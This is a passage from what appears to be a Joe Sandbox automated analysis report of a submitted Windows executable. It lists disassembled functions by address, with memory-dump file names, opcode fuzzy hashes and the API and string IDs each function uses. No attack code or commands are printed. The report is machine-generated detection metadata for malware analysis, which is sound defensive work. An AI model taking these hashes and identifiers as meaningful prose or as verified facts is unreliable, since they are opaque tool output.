                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ba7d415c593592a3e4339d049df5d7c78054e37d5defce6cf568c9a001b84ead
                                                                                                        • Instruction ID: 211022cfc56dbcd46f42b82e08f13bce1bc455bfca308cafa6a0b7f149b43a53
                                                                                                        • Opcode Fuzzy Hash: ba7d415c593592a3e4339d049df5d7c78054e37d5defce6cf568c9a001b84ead
                                                                                                        • Instruction Fuzzy Hash: E26178E2A086A14BF7349E34994077D67A5EB06BACF904232CE5A537E4CB38D842C331
                                                                                                        Function 00007FF79E99BF20 Relevance: .1, Instructions: 149COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3ca95f9bf79cadee7fd56b3ebd1ac633b5562677c2c3978bd7e233aabedc9847
                                                                                                        • Instruction ID: 05499ecf2545a946010aede124fa039a900287fe3e2309c6beb027b329f14ea2
                                                                                                        • Opcode Fuzzy Hash: 3ca95f9bf79cadee7fd56b3ebd1ac633b5562677c2c3978bd7e233aabedc9847
                                                                                                        • Instruction Fuzzy Hash: 8D5108A6E1C14556FB31BB758880BF8E795EB56BD0FC49131ED0E03388CA1D9A81C776
                                                                                                        Function 00007FF79E99BDE0 Relevance: .1, Instructions: 149COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e4aa9e4182f2e50364de2a15c1c1e0c896540baf561c3245e46b89c242035e23
                                                                                                        • Instruction ID: a2c4755d95b1e5c7867d650e54162410a5478b4dcc91bb4ba429045bc6626a4f
                                                                                                        • Opcode Fuzzy Hash: e4aa9e4182f2e50364de2a15c1c1e0c896540baf561c3245e46b89c242035e23
                                                                                                        • Instruction Fuzzy Hash: 0D512796E1864542F7317BB58480BB8E799EB55BD0FC49131EE0F03388DA1DAA81C776
                                                                                                        Function 00007FF79E97F5F0 Relevance: .1, Instructions: 121COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d76be46d653f83ad5ef5210ff2a4a8b857c13a8c348d2b6131243123030b049b
                                                                                                        • Instruction ID: dde195a4bc345efb5d0974dc320e92533251951104e679587e3f67d509624432
                                                                                                        • Opcode Fuzzy Hash: d76be46d653f83ad5ef5210ff2a4a8b857c13a8c348d2b6131243123030b049b
                                                                                                        • Instruction Fuzzy Hash: 24316D52B2851A43FE28913A8D157748283AF42BF0ED49331DE3ED7BE8ED3E94454121
                                                                                                        Function 00007FF79E97F440 Relevance: .1, Instructions: 121COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: cb85a316b1b28cddb3f2e513620ffe2f1ab2d54091b22ff193b08dd246418135
                                                                                                        • Instruction ID: 86bbf3d0560a7c92b387b9c3d91dcf0a887fec259d0e6de098f73b3727292bd4
                                                                                                        • Opcode Fuzzy Hash: cb85a316b1b28cddb3f2e513620ffe2f1ab2d54091b22ff193b08dd246418135
                                                                                                        • Instruction Fuzzy Hash: CC316853B3452242FE39953A8D58B7482837B467F0E989330EC3E97BD8E83D94854221
                                                                                                        Function 00007FF79EACBC00 Relevance: .1, Instructions: 84COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8e76adf4bf61782d73ca8af5ec3557a11f087345afd1e91fe95eb00d2e1b74ed
                                                                                                        • Instruction ID: 1f03d930c6ca776ab174e22c41e8f50f25a6d7cbef36644a07dffc3314ae5b8a
                                                                                                        • Opcode Fuzzy Hash: 8e76adf4bf61782d73ca8af5ec3557a11f087345afd1e91fe95eb00d2e1b74ed
                                                                                                        • Instruction Fuzzy Hash: FF31EF9BD0EAC54AF3A36B784CA54796F90DBA6D0078EC4B7C784423D3AD5F28548331
                                                                                                        Function 00007FF79E95F960 Relevance: .1, Instructions: 64COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2a4b5aaaee95637960a634f8f5c0b021c11b7ab42145f193b07c717f66579e7b
                                                                                                        • Instruction ID: b07c624eb45a8583ec740bfd57980e5249c87e4e8466b89e457179c91d7d0d48
                                                                                                        • Opcode Fuzzy Hash: 2a4b5aaaee95637960a634f8f5c0b021c11b7ab42145f193b07c717f66579e7b
                                                                                                        • Instruction Fuzzy Hash: 4A119EF2F349A449FBA4433C6C01F24AD859B633BCB589774E579D19D2EA1DE1039260
                                                                                                        Function 00007FF79E9A5410 Relevance: .0, Instructions: 50COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: aba1ab6dce893516dd973d8d6062043ca2dc6b32030dabdcf669dbffad7919a8
                                                                                                        • Instruction ID: 836cfb4913794149db31f36881dca524014e77431532915661af5e05c502ad4e
                                                                                                        • Opcode Fuzzy Hash: aba1ab6dce893516dd973d8d6062043ca2dc6b32030dabdcf669dbffad7919a8
                                                                                                        • Instruction Fuzzy Hash: 2B012BB6B240E006DB90D73A4C58D397B93D7C6792394D360D794C7B88DA3ED106C360
                                                                                                        Function 00007FF79E969484 Relevance: 24.1, APIs: 8, Strings: 8, Instructions: 107COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcmp
                                                                                                        • String ID: ACC0ACC1ACC2ACC3ACC4ACC5ACC6ACC7S0S1S2S3S4S5S6S7S8S9S10S11S12S13S14S15S16S17S18S19S20S21S22S23S24S25S26S27S28S29S30S31X0X1X2X3X4X5X6X7X8X9X10X11X12X13X14X15X16X17X18X19X20X21X22X23X24X25X26X27X28X29X30ELR_modeRA_SIGN_STATETPIDRRO_EL0TPIDR_EL0TPIDR_EL1TPIDR_EL2$SPSR$wR10$wR11$wR12$wR13$wR14$wR15
                                                                                                        • API String ID: 1475443563-3862453883
                                                                                                        • Opcode ID: b1a7e97f954b030fc789617bde8c08a95522fe00320205b97ede5649c0ca8685
                                                                                                        • Instruction ID: d8b477aae594a34467f4b6e91397ec6f36660d9731255d91751b9fc6b6244ff0
                                                                                                        • Opcode Fuzzy Hash: b1a7e97f954b030fc789617bde8c08a95522fe00320205b97ede5649c0ca8685
                                                                                                        • Instruction Fuzzy Hash: 21413965D0CA9288FB34BA3AA5C03B993555F05FE0FD44033CA4E5B7E1DE6CA9019277
                                                                                                        Function 00007FF79E92A0C0 Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 359COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$DirectoryEnvironmentProfileUserVariable
                                                                                                        • String ID: HOMEUSERPROFILE\\.\pipe\__rust_anonymous_pipe1__.$called `Result::unwrap()` on an `Err` value
                                                                                                        • API String ID: 3506484248-3720404459
                                                                                                        • Opcode ID: d7c07abaf9e50158387b918093629f4ed8af412cfd5b6e1afa6d678d6fcc476a
                                                                                                        • Instruction ID: 3087ace49b2a5cd9680674abb0b02ee9ec933da8e5784fdb51faf62716b6567f
                                                                                                        • Opcode Fuzzy Hash: d7c07abaf9e50158387b918093629f4ed8af412cfd5b6e1afa6d678d6fcc476a
                                                                                                        • Instruction Fuzzy Hash: EEF1C262A08BC249EB35AF3598843F9A355FF04BE8F814135DE5C5BB96DE6CE2408331
                                                                                                        Function 00007FF79E953F30 Relevance: 19.7, APIs: 9, Strings: 2, Instructions: 479COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$FullNamePath
                                                                                                        • String ID: \\?\$\\?\UNC\
                                                                                                        • API String ID: 2482867836-3019864461
                                                                                                        • Opcode ID: 73eb49ad670d308b025b75e1072208b7c23a84e3b22a4fb25ef5d90388299586
                                                                                                        • Instruction ID: 83e5c191eb4b89b80e2aa2276aca9e69a5056913d6ca7df0986526a26e1cec92
                                                                                                        • Opcode Fuzzy Hash: 73eb49ad670d308b025b75e1072208b7c23a84e3b22a4fb25ef5d90388299586
                                                                                                        • Instruction Fuzzy Hash: 9B12D362A0C69185EBB0BB3198847BDA3A5FB05BA4F804535DE5E477C9DF3CE5818332
                                                                                                        Function 00007FF79E99CE90 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 143COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionRaiseUnwindabort
                                                                                                        • String ID: CCG $CCG $CCG!$CCG!$CCG"
                                                                                                        • API String ID: 4140830120-3297834124
                                                                                                        • Opcode ID: 5b03064af3b6d8731af220ef8859a2e5255f14cbf9f3f4a672e6e3727d19e028
                                                                                                        • Instruction ID: a92c66e2335960d5b7b09d94972b590251746a9d1f7bfc58db25aa050159b35e
                                                                                                        • Opcode Fuzzy Hash: 5b03064af3b6d8731af220ef8859a2e5255f14cbf9f3f4a672e6e3727d19e028
                                                                                                        • Instruction Fuzzy Hash: 8B51B173A18B8182E7709B25E8807A9B374F799B98F909226EE8D13758DF39D5C1C710
                                                                                                        Function 00007FF79E929400 Relevance: 17.9, APIs: 7, Strings: 3, Instructions: 408COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$CaptureContextCurrentDirectoryEnvironmentExceptionRaiseStringsUnwindabort
                                                                                                        • String ID: Vars$called `Result::unwrap()` on an `Err` value$innerVarsOs
                                                                                                        • API String ID: 1982851867-2235028769
                                                                                                        • Opcode ID: 81f0b5ad55a65d210555d28c0575d3fbac638c4c01551ab7b438c5771c1c0d3a
                                                                                                        • Instruction ID: 0c6dc2928fbfdc4e494d4c40833c2ff654034e082f2cf94c2ec4d5398aa1410b
                                                                                                        • Opcode Fuzzy Hash: 81f0b5ad55a65d210555d28c0575d3fbac638c4c01551ab7b438c5771c1c0d3a
                                                                                                        • Instruction Fuzzy Hash: 83F1B162B09B9189EF30AF75A8807F9A364BB047A8F854135EE5C17B99DF3C9641C331
                                                                                                        Function 00007FF79E915EA0 Relevance: 15.5, APIs: 8, Strings: 2, Instructions: 483COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • assertion failed: match track_edge_idx { LeftOrRight::Left(idx) => idx <= old_left_len, LeftOrRight::Right(idx) => idx <= right_len,}, xrefs: 00007FF79E916833
                                                                                                        • assertion failed: new_left_len <= CAPACITY, xrefs: 00007FF79E916263
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy
                                                                                                        • String ID: assertion failed: match track_edge_idx { LeftOrRight::Left(idx) => idx <= old_left_len, LeftOrRight::Right(idx) => idx <= right_len,}$assertion failed: new_left_len <= CAPACITY
                                                                                                        • API String ID: 3510742995-2079967719
                                                                                                        • Opcode ID: 857e78b8965fadb09579569978df2369435fc3f52ba0ba4689f9be7771eada54
                                                                                                        • Instruction ID: f9945e9cf64097c004e804db62afbdbe469826810ff09549fd74cc9390161aa3
                                                                                                        • Opcode Fuzzy Hash: 857e78b8965fadb09579569978df2369435fc3f52ba0ba4689f9be7771eada54
                                                                                                        • Instruction Fuzzy Hash: C842AF32A04BC189E731DF24E8803ED73A8FB58798F948226DE8D1B795DF349295C320
                                                                                                        Function 00007FF79E950EF0 Relevance: 15.3, APIs: 10, Instructions: 317COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$Handlememcpy$ByteCharCloseConsoleMultiReadWide
                                                                                                        • String ID:
                                                                                                        • API String ID: 1487844572-0
                                                                                                        • Opcode ID: b32329691ac594cf0c797fcdd49d986ce4271e7beb4890205a8c8541e25f24b7
                                                                                                        • Instruction ID: 6eefec34df39c5f4a2e498f585750aa435dc3aad1dd54306ad8d5d50624cbe2a
                                                                                                        • Opcode Fuzzy Hash: b32329691ac594cf0c797fcdd49d986ce4271e7beb4890205a8c8541e25f24b7
                                                                                                        • Instruction Fuzzy Hash: 2CC1D361B0869285FB30FB7298817FAA795AF447E8F848431ED0D577C5DE3CE5818232
                                                                                                        Function 00007FF79E94FBB7 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 238COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Handle$CurrentDuplicateProcess$CloseErrorLast
